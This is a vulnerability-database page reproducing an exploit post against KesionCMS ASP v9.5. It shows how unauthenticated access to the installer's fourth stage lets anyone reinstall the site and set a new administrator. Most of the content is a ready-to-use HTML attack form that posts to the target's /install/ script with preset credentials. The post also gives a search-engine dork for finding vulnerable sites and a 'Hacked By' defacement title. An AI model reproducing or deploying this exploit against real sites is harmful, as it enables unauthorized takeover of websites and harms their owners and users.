Vulners
Lucene search
KesionCMS ASP 9.5 Add Administrator
`====================================================================================================================================
| # Title : KesionCMS ASP v9.5 Reinstall Add Admin Exploit |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) |
| # Vendor : https://www.kesion.com/ |
| # Dork : Powered by KesionCMS |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] copy & past this exploit listed below into a text file and save it with ".html" extension
[+] at Line 09 & 16 change the domain name of target .
[+] The infected folder is /install/
This is due to direct unauthorized access to the fourth stage (?action=s4)of the script installation
The fourth stage (?action=s4)is responsible for configuring the setting of the site administrator.
For this, the vulnerability can be exploited through the direct link or using the exploitation written below
[+] Exploit
<head><title>
Hacked By indoushka
</title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" />
<script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script>
<script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script>
<script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script>
</head>
<body>
<form name="form" method="post" action="http://www.target.127.0.0.1/install/index.asp" id="form">
<div class="guide">
<div class="guidetitle">
</div>
<div class="clear"></div>
</div>
<div class="clear"></div>
<input type="hidden" name="action" value="http://www.target.127.0.0.1/install/?action=s5" />
<input type="hidden" name="DBlx" value="" />
<input type="hidden" name="CkbData" value="" />
<input type="hidden" name="TxtDBName_a" value="" />
<input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden" />
<input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />
<input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />
<input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden" />
<div id="http://www.target.127.0.0.1/install/?action=s4">
</div>
<div class="clear"></div>
<div class="sjlist">
<h5>网站参数配置</h5>
<ul>
<li><span>网站名称:</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如:Kesion官方站</li>
<li><span>网站域名:</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。
如http://www.kesion.com。
</li>
<li><span>安装目录:</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。
系统会自动获取,建议不要修改。
</li>
<li><span>授 权 码:</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">
免费版本用户请留空或填“0”。
</li>
<li><span>后台目录:</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如:Manage,Admin,后面必须带"/"符号。</li>
<li><span> 后台登录验证码:</span>
<input type="radio" name="isCode_a" value="True" /> 启用
<input type="radio" value="False" name="isCode_a" checked="checked"/> 不启用
</li>
<li><span>管理认证码:</span>
<input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用 <input onclick="$('#rzm').hide()" type="radio" value="False" name="isCode" checked="checked" /> 不启用
<font id="rzm" style="display:none">认证码:<input name="TxtManageCode" value="8888" id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>
</ul>
<div class="clear"></div>
<h5>填写管理员信息</h5>
<ul>
<li><span>管理员账号:</span><input name="TxtUserName" value="admin" id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>
<li><span>管理员密码:</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>
<li><span>重复密码:</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>
</ul>
<div class="clear blank10"></div>
<div style="padding:5px">
<input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">
</div>
</div>
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jun 2023 00:00Current
7.1High risk
Vulners AI Score7.1